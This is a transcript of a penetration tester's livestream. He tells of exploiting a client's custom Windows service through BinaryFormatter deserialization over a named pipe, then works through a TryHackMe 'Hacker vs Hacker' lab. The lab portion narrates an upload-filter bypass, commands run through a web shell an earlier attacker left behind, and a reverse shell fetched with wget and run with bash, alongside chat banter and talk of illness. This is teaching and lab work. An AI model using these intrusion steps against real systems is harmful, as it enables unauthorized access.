This is where the fun begins.
Ugh. I remember when I wasn't coughing all the time. I miss those times. I miss that time. It was a simpler time then. It was a simpler time.
A hunter must hunt.
Wow, 17 months. Thank you for giving this community the opportunity to learn and grow together. Less than 3.
All right, we're here. We are here. Despite my body, we are here. Welcome, everyone. Welcome. Finglui Muguwanaf Cthulhu Rilje Gagnagel Faten. I'm still a little sick, but I'm feeling good enough today that I can at least attempt to stream. So I just ask you guys to be patient with me over with the coughing, and if I sniff my nose at all, I apologize. Again, I don't know what I have. The last time I tested for COVID, like a couple days ago, I was still negative. So I don't know what I have. But whatever it is, it sucks. It has me congested, and it has my throat hurting like a motherfucker. So I couldn't speak really at all on Thursday. Now my voice has mostly come back, but it still sounds a little hoarse, you may notice. So again, I am improving. It's just a slow, arduous improvement. And I'm hopefully I'll be back to normal by Tuesday. Your voice is yes, my voice. That's exactly what I said. Did I stutter? My voice is indeed a pony. Yes, thank you. Thanks for that. It sounds sexy to me. Oh, I'm glad it sounds sexy to somebody. So, I ended up doing some work yesterday and being reminded that hacking is a ridiculous enterprise that no one should ever do, because I spent my whole day essentially trying to pen test a client's client service that I was so sure was vulnerable, and I'm still sure. Okay, so here's a question: is a service technically vulnerable? If it would be vulnerable if it actually worked. Like, the only reason it's not vulnerable is because the service actually cannot perform the function that it presumably is supposed to be performing. Like, does that make sense? Like, the service literally is broken. But if it wasn't broken, it would be vulnerable to RCE. Is that... Ask the client to fix the bug. It's not the box that's broken. It's the service itself. It's a custom proprietary service. And if it worked, and I fixed it. Well, I didn't fix it, but I figured out what the problem was after a whole fucking day of the same fucking error. A whole fucking day of the same goddamn error. I tried everything to get everything I could think of to get my exploit to work. And this is the kind of exploit that there isn't a tool that online that'll do it for me. I had to write a custom I wrote an entirely custom C# program for this to get it to demonstrate this RCE. So it was I was struggling with I was struggling with, first of all, the vulnerable service is just that, a service. Which, if you don't know, Windows services are like a special class of program, and you can't see the console output of them, and you can't see errors. The closest you can get, as far as I can tell, is in the event log, where in the event log where it says if the service crashes, it'll say this service terminated unexpectedly. Thank you, Windows event log. I appreciate that. I was able to tell that by the fact that the service is no longer running, but thank you for letting me know that the service no longer works or is no longer running. So I needed to see the error. The first thing I was happening is I was trying my error and the service was just crashed. Okay. Do you want the whole story? Do you just want me to tell the whole story? Or is this not interesting to anybody? Do you want the whole story? Do you want the whole story? Or is this not interesting? We just want to get to the hacking. It's up to you guys. Hey, Al Husred, I just want to say thank you for the comment you made about Hack the Box Easy Boxes on Twitter. I spent most of my time on TryHackMe and doing decent as a beginner. I just tried easy Hack the Box support and heart because I cannot find anything. Yeah, exactly. That's all I'm trying to say. All I'm trying to say is that Hack the Box Easy machines are just they don't abide by their own criteria for easy machines. They just, and it's demoralizing to people. It turns people off, and it keeps people from using their platform. All I'm trying to do is make Hack the Box better. That's it. If your health is up to it, well, we'll see how long I can talk for today. I don't know how talking constantly is going to work, but as you can see, I am struggling a little bit, but I'll make it work. Okay. All right, whole story. Okay, fine. I'll tell you the whole story. So I can't show you guys. Okay, don't ask. I can't show you what I've been working on, and I can't show you the service. I can't show you. This is all client stuff. Okay, I can't show you that stuff. Anyway, a client has me testing their upcoming workstation build. Like they've got a new build of their workstation on a new version of on a newer version of Windows, with some new configurations and so on, and they're asking me to test it. I've been sick this week, but not so sick that at least I don't have a headache or anything. I've been mostly congested. My voice has been out, and generally just feeling ill. But I'm not so ill that I can't get work done. When I'm not watching, I did watch a lot of Severance. I got through a lot of Severance. I'm not completely done with it yet, but I did get through some of it. It's only an experimental workstation. It's not live. Anyway, they give me, I have an image of the workstation. I spin it up and I poke at it, and I find a service that's interesting. I initially find it because of Power Up, because it had an unquoted service path. It had an unquoted service path, and it wasn't named anything that I recognized. So I was like, oh, this must be a custom proprietary service. Okay, and I was like, okay, this is interesting. So I go and I have read access to the directory. So I pull the service down. It has a DLL with it. I pull the service and its DLL down. I look at them on Linux, and they're .NET assemblies. They're C# .NET assemblies. well, which is spectacular. And do you know why that's the case? That's a really good thing to find. Does anybody know why that's the case? The reason I was focused on this service because it's proprietary. It's custom. Custom stuff is usually riddled with vulnerabilities. Yeah, decompilation. Okay, so C#.NET assemblies can essentially be trivially decompiled into something approximating their source code. You can't get exactly the source code back because there are various optimizations that the compiler will do when you actually compile it. But you can get essentially something really close to the source code back to essentially just read the source code of the application. My favorite tool for this is dnspy. dnspy has been my go-to tool for this. It's very powerful, and we're going to talk about more ways in which it's powerful in a little bit. So I'm like, oh, spectacular! I don't have to put it in Ghidra. Excellent. Because Ghidra is much more of a pain in the ass. So I can just throw it into dnspy and see the source code. Great. Fantastic. Okay, I like what I'm seeing here. I throw it into dnspy and I start reviewing it. And when I'm doing source code review, I like to start off by just doing a keyword search. Like, I like to look for words that are commonly associated with vulnerable code. So does anybody know what kind of what words in a C#.NET assembly, what are some words that I might search for? Password, yeah. Password is one word. Words that are commonly associated with vulnerable code, because usually you're looking at a wide variety of, these assemblies are often very large, so you have to find a way to parse the code. So this is just how I like to start. I'm not saying F1 word. Load other libraries, yeah. You want to look at its references. Execute, maybe, yeah. None of you have hit on the password is a good one. File operations are a good one, yeah. None of you have hit on the word that particularly is important here. Credential, yes. Yeah, PHP 8.1.0/dev. Buffer, no. I'm not saying C# can't be vulnerable to buffer overflows, because technically it can, but it's kind of rare. Not system, not network. If you search for system, you're going to get a ton just in the references. Header files, this is C# and not C. Still nothing. C#. Think C#. C# specific vulnerabilities. God, you know what I finally, okay, Husky comes in. Okay, deserialization. Okay, good. I like to hear that. So what particular word would I be looking for when it comes to deserialization? I hope you're I'm feeling a little bit better, Husky. Good enough to at least attempt to stream, but as you can tell, my voice is still wavering, and I'm suffering a little bit, but I'm okay. Injection, nope. Like the word, so how does these, so it's not going to be console.println, it's going to be deserialize. How about the word deserialize? How about that? And the reason we were looking specifically for the word deserialize is because that's the name of the method in binary formatter, which is the primary .NET class that is vulnerable to deserialization. Binary formatter is deprecated, and Microsoft does not recommend its use because it's vulnerable. If you pass user-supplied data into it, it is vulnerable. So the deserialized method is specifically what I was looking for, and I did find one instance of it. I found one instance of it in a method that was called I think handle task. Yeah, it's called handle task. And I started working around that code. I was seeing it was accepting based on that method. I found that it was accepting data from a named pipe, and it was deserializing it It was binary format or deserialization. So so vulnerable. If I can access the named pipe, it's vulnerable. Already we know there's a deserialization vulnerability right there. Yeah, it is like pickle loads dumps for C#. Yes, and for the same reason, object-oriented languages tend to be vulnerable to this kind of thing. So, and then it's doing some stuff with it. There's a variety of things it could potentially do. It is doing file operations, and there was the last one, which involved updates, which involved there was a last one that was intended to trigger an update. We'll get to that in a second. But basically, I just wanted to see. There was the most interesting function is one that was triggering an update, and I went over to that method. And this method was obfuscated for some reason, and I'm like, "Ooh, boy, why would this method be obfuscated?" But it was obfuscated poorly, and in a way that I could in a way that I could reverse it. So I was able to reverse the method. And figure out what it was doing, and it was actually loading a shell execute com object. And what do you guys think shell execute does? Hey, but just off the top, like, just take a shot in the dark at what you think the shell execute com object does. Just take a shot in the dark at what that fucking shit command does. Yeah, well, it runs shell commands essentially. It runs an application of your choice with given arguments. So it was basically taking the serialized data and was feeding it to this shell execute com object initialization, and then it was feeding a series of applications and associated arguments in there, and then executing it. So I was like, oh, good, I can just pop calc. I'll just pop calc.exe and I can prove remote code execution. At this point, this seems pretty straightforward. I checked the named pipe permissions, and of course it has everyone read write. Of course, everyone has read write to the named pipe. I'm like, oh, good, this is fucking straightforward as hell. No problems whatsoever. We're not gonna have any issues with this. Like, I'm literally just going to send it a serialized object through the named pipe. Easy fucking peasy. You can do this while you're sick. Not a problem. This is what Al said at noon yesterday. Al at midnight was not as happy. Anyway, I write a custom C# program to do exactly that. I create the custom object that it's looking for. I serialize it, and I send it to the named pipe, and the service crashes. I started the service up. I installed the service on my test box, and I had it running. And I had Process Explorer up to look at it because I wanted to see that calc.exe had spawned underneath of it. So I send my serialized data to it. Service crashes. Fuck. So this is often the way with serialization. A lot of times, if the serialization isn't handled well, or if it's not in a try-catch block, which the serialization was not in a try-catch block, we're gonna have problems. I look at the code again. I'm like, oh, I got this wrong, and I tweak it here and there. I'm not really sure what is going wrong but I see that I did have my payload wrong in some areas, and I fix it. I test out some other things. What's this for again? This is I am assessing a Windows, a development build for the Windows workstation for a client. This is only one service, one custom proprietary service that they have running on their build. I test out some things, making sure that aspects of their code work the way that I expect, because I'm comfortable with C#, but I'm not like super comfortable. Like, I'm just making sure their things are working the way that I want to. The things are working the way that I think that they work. I test out some more things. I send some more payloads, and every single time the service immediately crashes when I send it serialized data. And I'm like, God fucking damn it. I need to at least see what the errors are. And this is where I ran into the problem with a Windows service. Windows services can't be easily debugged. They have to be installed as a service, and then they have to be dealt with as a Windows service. It's a pain in the ass, okay? It's a giant pain in the ass. So I fiddled with it for a while, trying to figure out how. I did a lot of Googling and fiddling with it, trying to figure out how I could get this service to work the way that I expected. Not to work the way that I expected, to get the service to at least show me the error output, at least show me what the fuck is going wrong with my payload, so that I can fix it. So at this point, I go down an intense rabbit hole, and I eventually decide I've got to modify the service, if only to get error output. So one of the powerful things about dnspy is it actually allows you to modify the assemblies. You can modify, recompile, and then save the new assembly over the. You can save the new assembly, so you can. dnspy not only allows you to view the source code, but also modify it if you want. So I exported the whole thing. I exported the entire module, the entire .NET assembly, onto the disk and loaded it up in Visual Studio. I changed it to a console app, and I added a helper function to detect if it was running in a user environment or not, or if it was running in a user interactive environment or not. And if it was running in an interactive environment, it would spin up a thread with the service running in it. But it would have a console, and so I would be able to see the console output. So I would be able to debug it. So I got all this working. This took God knows how long. Fuck, I fucked with this for fucking forever. I don't even know. I didn't keep track. It took a long time to get it to work that way. And then I got it spun up finally, and I can run it in the console. I can just execute the .exe file in the console. It executes, no problem. Everything works. Goody. Now I send it. I send the payload to the thing. It crashes, but now at least I can see a stack trace. So that's very valuable. I can see the error. And the error is that error is, as I expected, it's from the serialization, and it's giving an error that says incorrect binary format or invalid binary format. I'm like, what the fuck are you talking about, binary formatter? What in the name of God are you fucking talking about? Because I'm serializing you with binary formatter. It's the exact object you're trying to look for. And I'm sending it to you in the way, and I'm like 99% sure the correct way. Why are you not accepting it? What the fuck is going on? So I play with the payload a bunch more times. I try a bunch other things. I tried reading the serialized data to a memory stream and then copying the memory stream into the client or into the named pipe. That didn't work either. Same error. No matter what I did, I got the same error. Like the same error about invalid binary format. And I'm like, what the fuck is going on? Finally, I was so mad. And by this time, it's like nighttime. Okay, it's like fucking nighttime. I can't get this seemingly simple deserialization exploit to work. Is it technically a deserialization? It is technically a deserialization exploit, even if I'm just using the raw functionality of the application to do malicious things. It's complicated, okay? I think I'm going to call it two vulnerabilities. I'm going to call it an RCE, and then I'm going to call it a deserialization RCE as well. I'm going to break it into two vulnerabilities in the report. Because it is vulnerable to WISO serial as well. Yeah. So I think I'll call it, but I'll count it as two vulnerabilities. Anyway, I finally get that same error every time. Invalid binary format. And I'm like, what the fuck is going on? So I finally decide I'm going to copy all of this code. Or not all of it. I'm going to copy all of the named pipe code and the serialization code into a new server, into a new project, without any of the other parts of the code, because it was doing other stuff, and I wanted to try and isolate what the issue was. I wanted to try and isolate what the fucking issue was. So at this point, I copy all of the code, the serialization code, the named pipe code, everything that it needs to just do the serialization and listen on the named pipe into a different project, and then I send my exploit to that, and it works perfectly. Like, it deserializes It deserializes and handles the data without an issue, no error, no invalid binary format. So at this point, I'm like, what the fuck is going on? What the hell? At least I know I'm not crazy and I'm doing something wrong. At least I know I'm not crazy and doing something wrong, because the serialization is working. And then I went back to the server code, and I see that it is doing. Oh, hi, not Wahid. Good to see you. It's good to have you in the cult, my man. Thanks for being here. Nothing was hijacking. What was happening is that the application was threaded. And this is where my question goes in: is something vulnerable if it literally cannot be used for its normal function? And the answer is that it was threaded, as in somebody decided to set up the pipe to be both asynchronous and threaded. So the application itself was threaded. So when you start up the application, it was running. I put a bunch of console write lines in there to see what code was being executed and when. And I found out that the application is starting up like 3 threads. 3 threads that are all independently listening on the named pipe. So what's happening, I think, is that I'm sending the data to the named pipe, and the threads are all getting pieces of it. Like, instead of one thread getting the whole payload, like 3 threads are all getting shards of it. Like the 3 pieces of the Triforce. And if anybody knows anything about the 3 pieces of the Triforce, it's that they're all fucking worthless unless you have all 3 of them.
Hunt.
Okay? They're like pieces of Exodia, okay? They're all fucking worthless until you have all 5. So, what was actually I think what's happening is that the threads are each getting a piece of the payload. So this is what I'm talking about. Like, I literally cannot use the server for the normal function in which it's meant to be used. I'm not even technically trying to exploit it at this point. At this point, I'm just sending in any object. At this point, I'm not trying to get RCE. I'm just trying to send it the object it's expecting in a serialized format and getting it to get past that code block with the serialization without crashing. I had a problem, tried to use threading to solve it. No problem, I too have. Yeah, so I go to the client and I'm like, what is going on? Your server does not work. And they got back to me this morning. They go back to me this morning. I'm like, what's the deal with this service? And I named the service, and I explained the issues I was having with it. I was poking at it, and they said, oh, that's a brand new development service. It's not ready to be deployed yet. And I'm like, then why the fuck is it here? Why am I testing it if it's not done? So the service does literally not even work. I would have never thought threading would cause this. That's what I said. I didn't even think it was. I thought it for sure. I was just serializing it incorrectly. I thought it was a problem of endianness for a while. I thought it was a problem. I thought it was a problem of architectures, of different .NET versions, different binary formatter versions. I went through a ton of things in troubleshooting. And I couldn't get it to work. I had the same error no matter what I did. And so finally at this point, because again, at this point I have the whole thing decompiled and opened up in Visual Studio. So I essentially have my own custom version. And I just commented out all the threading. I was like, we're just going to run this thing in a single thread like the good Lord intended, okay? We're just going to run this thing in a single thread like the good Lord intended. And hang on, I'm going to find the screenshot. Does the screenshot show anything vulnerable? Or show anything? Okay, hang on. Let me just open this in Paint. It does reference the client. Hang on 1 second. I'm going to modify. I didn't think that I was going to do this. Let's just open it up in Paint. Just really quickly, I'm going to redact the parts that incriminate the client. 1 second. And also the name of the named pipe. They named the named pipe after the client too. Okay. Okay. All right. So I modify it to remove the threading. I started as a service this time because I want to see if it's gonna work. And looky there. And there you go. As for those who can't tell, this is me starting up the service. Okay, I'm starting the service. The service is it always says start pending when it first starts, but it's starting up. I run my exploit, which connects to the named pipe. And it pops, and this calc.exe is evidence of code execution. I managed to get it to pop calc.exe. Does that make sense? So it does work if you remove the threading. So after a whole fucking day of the same issue, honestly, it should have been an hour of putting this exploit together. It's not complicated. It wasn't rocket surgery, okay? I could have put it together much quicker. But I spent almost the whole day fucking wrestling with the fact that the goddamn service doesn't even work. So, I also used YSO serial against it. I think I'm gonna call it two different vulnerabilities because I don't know. Technically, it's still a deserialization vulnerability, but the normal functionality of the app, like if you send it just the object that it's expecting, the whole point of deserialization is you send it an object other than the one it's expecting, and it deserializes it anyway because that's how binary formatter works. And if you send it an object that executes code, it will execute code at the time of deserialization. So it works with YSO serial, and it works with in this case I wasn't sending it YSO serial. I just happened to be in that directory. This is just the normal payload. So I think I'm gonna call it two different vulnerabilities. But it's tough to say. On the report. But I am going to put it on the report because it is vulnerable if it did work. And I don't want them to make it work, and then all of a sudden it's super vulnerable. And it's vulnerable for more reasons than just this. But anyway, this is why hacking is a miserable enterprise, and no one should ever do it. Okay, that's the moral of the story for today. Any questions about that whole debacle? Any questions about that? Maticus Maximus with 17 months. Welcome back to the All Has Red team. Wow, 17. Has it really been 17 months? That's incredible. Alpha 2 with the 9 months. What are we naming? Are we naming our kid Alpha 3? Welcome back to the All Has Red team, my friend. Thanks for supporting the stream. Day, Andre, and Caliroot. Thank you for the follow. A lot of leet speak there. What did the client have to say after you got your exploit to work? They haven't responded yet. I haven't told them. I haven't decided what I'm even going to do with it. I think I'm going to make it I'm going to put on the report as two separate vulnerabilities. I'm not really sure yet. Two separate RCEs look scary on a report. And part of the reason that you're writing the report is you want to scare them a little bit. Technically, an argument could be made that they're both the same vulnerability. But even if I send it the object it's expecting, and the object it's expecting is itself vulnerable. So it feels a little weird to call it just a deserialization vulnerability because, yeah, it's deserializing, but the normal functionality of the app, even if it was deserializing safely and checking the type, the way that you use deserialization safely is by checking the type. Even if it was doing that before deserialization, it would still be vulnerable because the type it's expecting is itself vulnerable. So that's why I'm going to call it, because this is a deserialization vulnerability that can't be mitigated through just the normal remediation of a deserialization vulnerability. So I think I'm going to call it two vulnerabilities, two RCEs. Named pipes are accessible over the network through the SMB process. So this is not just a local code execution vulnerability. This is a remote code execution vulnerability. which is pretty sick. And it's also remote code execution as system, because it's a service. It's a remote code execution as system. All right, let's do TryHackMe. Who wants to do some fucking TryHackMe shit? Okay. Is remote code execution the vuln or the impact? It's the vulnerability. Well, that's a good question. I would say that deserialization is the vulnerability. The impact is remote code execution. I would say. We're gonna do TryHackMe today. We're just gonna have a good time. I don't know. I don't know what we're gonna do today. Let's just kick it a little bit, because again, I am hurting a little bit. Someone gave me Hack the Box VIP for free. What boxes should I actually do? There are some great boxes. What are some good ones, chat? We do need to finish Anubis at some point. On Hack the Box. I'm not doing it today, but we need to, at some point, we never actually finished Anubis on Hack the Box. Oh, Arkham was good. Monteverde was good, if I remember correctly. There we go. Let's do challenges. Newest. All right. What are we doing? You as well, Brutus. This is a brute force, I think. That's probably not wise. What do you guys want to see? What? Can I help you with something? She came in the room and she just started yelling. She's just, if you can't hear her, she just came in the room and just started yelling. I don't know why. Binary, we're not doing binary today. I'm not feeling up to it. Kitty wants some love. She's gotten so much love, okay? And she has been a nightmare over the last couple of days, so can you show some? Everyone always wants to see the Windows boxes. So the problem with TryHackMe on the Windows boxes is they don't give the Windows boxes enough resources. Windows boxes are always ridiculously slow these days. It didn't used to always be the case, but it is here. It is now. I don't know if they reduce the resources their boxes get or what, but the Windows boxes are not getting enough. Does Hack the Box have any reasonable binary exploitation in its retired arsenal? Oh, yeah, it definitely does. I don't remember what boxes they are, but maybe Nightmare? Nightmare is one that has binary exploitation, if I remember right. What are you guys thinking? What do you want to see? Everyone always wants to see the Windows boxes. We'll throw some Windows boxes in there. Don't worry. Let's hide completed. Hacker versus hacker. This one seems fun. This one seems fun. Hacker versus hacker seems cool. Put that one in. How are you today? I'm not doing all that great, but I'll be... we're trying a stream anyways. Olympus was okay, but may have some malding. I'm okay with malding. To a certain amount of degree. All I did was mauled yesterday, so... I might not be as good at malding today because my voice is out, or my voice is hurting. Committed. If there's a particular box you want to see, say it in chat. I see a question in chat. I can't read the whole thing at the moment. I'll get to that here in just a second. I can't read the whole thing because the create a new poll dialog is up. Bet. No, I don't want to do any binary today. No binary today. I know you guys always want to see the binary and you always want to see Windows. And then when I actually do the binary, everybody leaves because it's all too much for them. So everyone asks for the binary and then everybody leaves. Here's some deserialization, but in JavaScript. Let's get a Windows box in there so that everybody can vote for that. Investigating Windows. I've done raw. I don't know why. It's, of course, all the only ones are... we'll put Year of the Owl in there, I guess. It says I've done it before, but I don't remember it. Okay, get your votes in. Is there a trick to tweaking John the Ripper? It doesn't work out of the box after installing the Kali image in VirtualBox. I've been at it for the past 2.5 days. I'm currently a Kali installation expert. I've never had a problem with John the Ripper, even after the... I don't... What error is it giving you, Just a Guy? It works fine, as far as I can tell. I've never had to tweak John the Ripper when I installed it. Yeah, no password hash is loaded. That probably means that it's probably a you problem, my dude. Are you sending it a password hash that of a format it recognizes? Try hard coding the hash type. Try making sure your hashes are in the correct format that it expects. No hashes loaded sounds like a you problem. It sounds like it's working just fine. But it sounds like you've got the hashes in an incorrect format. Yeah, new lines, white space can cause issues too. Yeah, definitely. It looks like hacker versus hacker is the clear outlier here. So I'm going to go ahead and assume that one's going to win. We'll get started on that one. As always, if we don't get through it and I still have streaming left in me, we will do another box after this one. Imagine doing a buffer overflow and you have all of the pieces together and you send your exploit, get a connection back, but it's not a full connect. Spending an hour troubleshooting, only to find that you generated your payload. Oh, that's a very common mistake. That's a very common mistake that beginners make. That I believe I made that error the first time. When I was doing my first buffer overflows, I believe I made that error. That is a very common mistake to make, especially with MSF Venom shellcode. One thing you can do to mitigate that is you can go to shellcode. Shellstorm. You can go to, that's what I'm thinking of. Shellstorm. Shellstorm has like has shellcode in here. And it even has an API. So you can just so you can just like reach out to the API and you can go like reverse. Yeah, here you go. So then it gives you a whole bunch of examples of TCP reverse shells. You're gonna want one that fits your version. Dynamic null-free reverse TCP shell. This one seems pretty fucking spicy to me. That one seems pretty good. So this is something you can do. You do actually have to you do obviously have to compile this. This is the actual shell code's right here, right? Oh, it's right here. The script requires keystone to generate. So it looks like, oh, it's compiling the shell code for you. Okay, so it's compiling the shell code right here. This is a Python script that compiles the shell code for you. So yeah, this seems pretty good. Linux x64. This is a good way to make sure to like this is a it's called shellstorm.org. If you don't want to use MSF Venom, if you think you're having problems with MSF Venom, this is the place to go. Shellstorm is a real good resource. Yeah. By the way, I'm sorry guys about how much I'm hurting today. Like but we'll go ahead and get started here. Ping 10.10.246.1. Hopefully by Tuesday I'm back to full strength. I'm praying to God that's the case. 10.246.1. Okay. So we do see it's a TTL of 61, which means it's very likely a...
It's a Unix system. I know this.
Have you tried getting good? I have done everything. My immune system is the one that needs to get good, okay? TryHackMe. Hacker versus hacker. Okay, we'll start up tmux. We'll do nmap. The standard preliminary nmap scan. Oops. Looks like I forgot to copy the IP address into my clipboard there. There we go. Have you tried using a /25 network? Yes, maybe. That is true. It would probably be helpful if I used /25 in my immune system. You know, I related that to John Hammond when at DEF CON. I was like, look, John, my friend, far be it from me to tell a content creator such as yourself, who's, you know, far more relevant than I am, how to do his thing. But your name is literally John Hammond. Like, that's literally just your name. And I've literally never heard you say spared no expense. I've never heard those words come out of your mouth. Like why? You know, like, you've been handed free branding. Why is there not dinosaurs everywhere, all over your branding? What's going on? You're like, honestly, like, that branding was just sort of handed to you on a silver platter, okay? Like, and he laughed. Apparently he's made CTFs that were Jurassic Park themed and stuff like that. But he's just not really one for a lot of branding, I guess, which is his choice. And again, he's far more relevant than I am, so far be it from me to tell him how to do his shit. I was just like, if my name was John Hammond, that'd be a fucking gift. That's just a gift right there. He kind of looks like that dude. Oh yeah, like 50 years from, like, no, 40 years from now, he'll look just like that dude. Get a little whiteness in that beard. Oh yeah. All right, we're going to scan. We see 22 and 80 are both open. So we'll do a full port scan while we... He definitely does. Again, it's a gift. It's all about branding. And it is all about branding. And it hurts me that he's kicking a gift horse in the mouth like that. I've been having one of those shower moments, like, where I, you know, think about conversations I've had in the past. There was a part at the DEF CON At the Red Team Village keynote. Oh, box name. Thank you. At the Red Team Village keynote, where John basically said he likes to collect the certifications. He just likes to get them. And I said he was treating them like Pokemon cards. Or just like Pokemon. I said he was treating them like Pokemon. And that got some laughs. But it would have been even funnier. It would have been even funnier if I said he spares no expense. He spares no expense when it comes to certifications. Like, that would have been even funnier. Like, and I've been thinking about that ever since. I'm like, I missed an opportunity. I took the lesser joke when I could have gone with the I could have gone for the gold on that one. Good to see you alive. How are you? If you can tell in my voice, I'm not doing all that great, but I'm good enough to lead that I could stream. They do be pricey. Yeah, exactly. He spared no expense. It was a gift. It was the fact that he never says spare no expense is hurting me. Recruit sec. Stop coding security vulnerabilities. Hire the best security consultants in the industry. There's a contact us thing. And it just lets you upload a file. Please upload your CV below, and we'll get back to you if you think your skills might earn us a profit for doing nothing beyond sending a few emails. Yeah, that's it's too real now. It's too real now. Okay. Whoever made this box is based. Read the contact. The most important piece of functionality in this brochureware site is inexplicably not developed yet. This is... That's pretty funny. Percentage of your 3% security consultants. Well, this is like 10% luck, 20% skill, 66% breached companies. Who knows what the acronym XSS stands for? 90% foreigners, percentage of the population outside our borders involved in hacking. Okay, that's a little bit suspect, but he's not wrong. He's not wrong, but it's a little weird that he'd call attention to that. It's a little weird. Okay, a little weird. 66% breach companies, percentage of companies that will have a breach today. 60% of companies will have a breach today. Yeah, whoever made this is definitely a meme lord. I'm here for it. So obviously we see a file upload here, but I'm gonna start a GoBuster just in case. Husky Hacks is here too. Yeah, he's a friend. I am proud to call Husky a friend. By the way, my video should be coming out either today or tomorrow, fellas. My editor got overloaded with work this week and hasn't been able to finish it. So once she is done with it, I'll get it uploaded for you. Okay, we do see a file upload here, so let's go ahead. Cthulhu.txt. Cthulhu fhtagn. Let's just see if we can upload a regular text file. A hunter
must hunt.
Home. TryHackMe. Hacker versus hacker. Cthulhu.txt. Upload. Hacked. If you don't want me to upload my shell, better do better at filtering. Okay, so this is obviously put in here by the hacker or whatever. Okay. What target dir is CVS? Or CVs? Cthulhu.txt? Oh, it's not there. Does CVs exist? It does, but directory listing is disabled. If there's .pdf in the file, so basically string position points to the first iteration, the index where this string exists in this string. So basically .pdf just needs to be in the file name. Success, we'll get back to you. So the only filtering it seems to be doing is if we just move Cthulhu.txt, Cthulhu.pdf.text, and then we upload that. I bet you that'll work, assuming this code is accurate. Hacked again. Still not there. So I must have missed something. Or this isn't the real code. This part messed with my head a little bit. PHP is always a pain in the ass to read. I remember I had a weird deja vu that I remember Tiberius streamed this box like a week ago. Oh, it's a new box, I guess. How you customize your terminal, it's awesome. Yeah, I'm glad you like it. It's mostly just cool retro term. So if you can just download cool retro term, and it'll look mostly like this. I did some other custom things, but if not, string position target file. This is literally just looking to see if .pdf is in the file name. Am I wrong about that?
A hunter must hunt.
Targeter dot base name. Maticus Maximus bringing Ted918 into the cult. Welcome to the All Has Red Team, Ted. Thank you so much, Maticus. Coco Loco Popo with the 19 months re-indoctrination. Welcome back. Ermalif and Daltonic, thank you for the follows.
A hunter must hunt.
Yeah, the error message is different. Like, I don't... it's clear that the hacker did some stuff. I don't know if this is the actual code. It's clear that this isn't the actual code that's being executed, or at least it's been modified to some degree. .php .back. Maybe there's a backup. Nope. So there's a number of things we can try and do to filter. It could be that the hacker put in some mitigations. So let's go ahead. Try PHP instead of TXT. I mean, we're going to run into the same thing. We're going to run into the same problem. So this is a case in which it's clear that the hacker has done something.
Love the streams. NGNGNGNG.
It could be
NGNGNGNG.
Thank you, Fantasy Suhal.
Hype train choo choo.
Appreciate it. Hey, Handles with the 69 tickle biddies. Nice. Fantasy Suhal with the 2 months. Welcome back to the All Has Red Team. Beer Force with the 3 months re-indoctrination. Welcome back, my friend. So it's clear in this case, because this string is not anywhere in here, it's clear that the hacker has... It's common for people to, once they've compromised the machine, to patch the vulnerability that originally gave them access. That's one thing that I believe Conficker did that. One of the most famous worms in history actually patched the vulnerability behind itself. Once it had code execution, it would patch the vulnerability behind itself so that nobody else could get in. So this is actually a fairly common thing that real attackers do when they find some kind of a vulnerability like this. So we probably want to go buster the CVS directory. Let's see if we can find the actual hacker's shell. Maybe we can find his web shell. I think there was a hack the box machine where that with a similar premise to this one, meaning you were breaking into a machine that had already been compromised, and the initial access involved finding the web shell that the previous attacker had uploaded in before literally shell.php. It's worth a shot. Shell.php. No. We don't want... Let's take the txt file extension off. Let's do 50 threads. We might want to do like common shell names. That's a slick idea for a box. Yeah, it was pretty cool. I guess what we can try is shell.pdf.php as well, right? Because we saw that in the original code. In the original code, the bypass here is they think they're looking for PDF files, but really all this does is test to see if .pdf, if the string .pdf is in the file name. That's all it's doing. So if you just have two file extensions like .pdf, .txt, it would bypass that. So let's try that. Okay, well, it wasn't shell.php, in fairness. In fairness, it was not shell.php. So technically, Maticus was wrong. Technically. And being technically correct is the best kind of correct. There's nothing in the world. Sex is great, but have you ever been arguing with someone and have them tell you that you're technically correct? You ever had that happen? How good does that feel, okay? Sex feels really good, but not that good, okay? And that's how I feel right now. Technically correct. All right, so can we do like CMD equals ID maybe? Yeah, of course. Okay, so just the most standard... The most standard shit of all time here. So we just have code execution through the previous attack. Okay. We just have code execution through the previous attacker's shell here. I don't think we even need burp for this, so we can do 10.13.10.69. Nice, the sex number. Copy the reverse shell. I think we should be able to just paste it in here. Let's find out. I feel like this sometimes works and sometimes doesn't. Okay. It does not work. So instead, what we can do is, because I'm too lazy to actually use burp, instead what we can do is echo tac n. Right there, and then we can base 64 encode it. I can't believe shell.pdf. Okay, shell.pdf.php is pretty funny. I can't believe that actually worked. I didn't expect it. I expected to have to go buster it. Echo. What you had to do on the Hack the Box machine is you had to look up common web shell names. You had to get a word list of web shell names and then go buster for that. So I expected to have to do something like that. Base 64-D. Base 64 is one word. Pipe that into bash. Did we get it? Any luck? No. I swear there was ways that I was doing this before. I don't suppose I could just send it a post request, can I? I don't want to do the script thing. I don't want to... I mean, I could just upload it as a bash script, which I guess I should probably do. Let's just go ahead and do that. We haven't done that in a while. Let's just upload it as a bash script. Okay, vim cthulhu.sh. Paste that in. Oh. You know what I need to do today? I need to finish watching Severance. I need to get through the rest of that. It's pretty good, honestly. Like, the vibe isn't what I don't know what I was expecting, but the vibe is not what I was expecting. It feels like if Mr. Robot was filmed in the back rooms. That's kind of what Severance feels like. Okay, so all we're gonna do. Okay, all right, so we can wget. X9, nice. Cthulhu.sh. Okay, we get a request. That's good. And now we need to make it executable, right? So we got a chmod plus x. Chmod plus x Cthulhu.sh. Okay, now we should just be able to execute it. God damn it. Can I just do bash Cthulhu.sh? There we go. We did it. Okay, wait, we did it. Okay, no. Okay, we're not gonna do it. All right, we got there. We got there with the basic remote code execution reverse shell functionality. We did it. Professional hacker, ladies and gentlemen. The machine did say there was filtering. Yeah, the filtering. This is the filtering. What more? This right here. This line right here. That's the filtering. Okay. The narrative here. House of Dragons was a disappointment for me. What? You mean Game of Thrones content was disappointing to you? Say it isn't so. This is unprecedented. Completely unprecedented that Game of Thrones would be disappointing. Imagine actually still watching Game of Thrones content or caring about Game of Thrones in the year of our Lord 2022. Imagine that. So the narrative of the box is that this was the upload script right here. Okay, this was the upload script. That was and it was doing some really weak filtering, looking to see if .pdf was in the file name, but because the filtering is weak, it could be bypassed. So the hacker uploaded shell.pdf.php, which bypasses this filtering, but the hacker has patched the vulnerability, so now stronger filtering exists, and we can look and see what he did to it. Python 3-c import pty. Dude, I'm so ready for my entire... I'm so ready to not feel like my whole head is just a big ball of snot. Like, that's what I feel like. Like, my sinuses have been just in absolute disarray over the past week. Nope. What the hell do you mean, nope? Are you just walling me? What is happening? All right, so the hacker is doing some bullshit. 